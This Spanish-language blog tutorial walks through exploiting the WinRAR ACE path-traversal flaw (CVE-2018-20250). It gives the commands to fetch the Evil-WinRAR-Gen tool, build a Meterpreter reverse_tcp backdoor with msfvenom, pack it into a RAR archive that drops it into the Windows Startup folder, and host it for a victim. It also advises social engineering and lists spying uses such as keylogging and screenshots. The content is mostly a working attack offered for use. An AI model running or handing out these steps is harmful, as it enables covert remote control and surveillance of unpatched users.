https://esgeeks.com/?p=6110
Exploit en WinRAR para controlar ordenador de la víctima
5 (100%) 13 voto[s]

En esta publicación, voy a discutir cómo WinRAR ha solucionado graves fallas de seguridad el mes pasado, una de las aplicaciones de compresión de archivos de Windows más populares del mundo, que solo puede explotarse (Evil-Winrar) engañando a un usuario de WinRar para extraer archivos maliciosos.

La vulnerabilidad identificada el año pasado por research.checkpoint.com afecta a todas las versiones lanzadas en todos los WinRAR en los últimos 19 años!!

  • CVE-ID: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, y CVE-2018-20253
  • Versión parcheada: WinRAR 5.70 Beta 1

1. Vulnerabilidad en WinRAR

Esta vulnerabilidad se debe a la biblioteca UNACEV2.DLL incluida con todas las versiones de WinRAR. Winrar utiliza el formato ACE para comprimir la carpeta y descomprimir los archivos con la ayuda de UNACE.DLL.

En las versiones de WinRAR anteriores a 5.61 e inclusive, existe una vulnerabilidad de recorrido de ruta cuando se crea el campo de nombre de archivo del formato ACE (en UNACEV2.dll). Cuando el campo de nombre de archivo se manipula con patrones específicos, la carpeta de destino (extracción) se ignora, por lo que se trata el nombre de archivo como una ruta absoluta. Esto sucede debido a una compilación incorrecta con unace.dll.

2. Evil Winrar: Explotar la vulnerabilidad

Descarguemos un script de Python que genere un archivo malicioso en un formato rar. Una vez que descargues el script de Python, instala la dependencia requerida para ello.

git clone https://github.com/manulqwerty/Evil-WinRAR-Gen.git
cd Evil-WinRAR-Gen/
pip3 install -r requirements.txt
Descargar Evil WinRAR Gen en Linux

Descargar Evil WinRAR Gen en Linux

Además, debes otorgar permiso completo al script de Python dentro de la carpeta Evil-Winrar-Gen y luego generar un archivo exe malicioso con la ayuda de msfvenom y el nombre “winrar.exe” como se muestra:

chmod 777 evilWinRAR.py
msfvenom -p windows/meterpreter/reverse_tcp lhost=<tu-ip> lport=1234 -f exe > winrar.exe
Exploit con Evil-Winrar-Gen

Exploit con Evil-Winrar-Gen

Ahora crea un archivo de texto que se mostrará a la víctima cuando extraiga el archivo RAR para confundirlo. Luego, ejecuta el script python de evilWinrar junto con el archivo exe y el archivo de texto maliciosos, creando un archivo malicioso que puedes enviar al objetivo.

touch winrar.txt
./evilWinRAR.py -e winrar.exe -g winrar.txt


Archivo malicioso con evilWinrar

Archivo malicioso con evilWinrar

Como se dijo, esta vulnerabilidad nos permite extraer el archivo malicioso en la ruta arbitraria, con la ayuda de este script permitiremos la extracción de archivos rar en el directorio C:\ProgramData\Microsoft\Windows\Start Menu\Programs.

Ahora usa la ingeniería social para transferir el rar malicioso a la víctima y esperar a que la víctima reinicie su máquina para obtener la conexión inversa del objetivo. Por ejemplo, creamos un servidor web con un simple script Python:

python -m SimpleHTTPServer 8080
Servidor web de IP local para presentar archivos

Servidor web de IP local para presentar archivos

3. Hacking Windows con WinRAR

Actualmente no hay un programa de inicio en la máquina víctima. Una vez que la víctima extraiga el archivo RAR malicioso “evil.rar“, backdoor winrar.exe se extraerá en los programas de inicio.


Para asegurarte de que el archivo winrar.exe está en la carpeta C:\ProgramData\Microsoft\Windows\Start Menu\Programs, ejecuta:

shell:startup
Ejecutar shell startup

Ejecutar shell startup

winrar exe en Start Menu Programs

winrar EXE en Start Menu Programs

Tan pronto como la víctima reinicie su PC/máquina, obtendrás una conexión inversa como se muestra a continuación:

Hacking Windows con evilWinRAR

Hacking Windows con evilWinRAR

¿Qué cosas puedes hacer? Muchísimas! Tomar screenshot, capturar teclas, tomar fotos, listar directorios, etc. Eso sí, algunos antivirus pueden detectar, el archivo RAR descargado, como malicioso.

Si te ha sido útil, ¡No olvides compartir este artículo! :’)


¡Mantente actualizado!

Suscríbete a nuestro boletín semanal...

Suscríbete a nuestro boletín electrónico para recibir artículos útiles y ofertas especiales. No te perderás absolutamente de nada!

Enviaremos solamente boletines al email y no compartiremos tu email.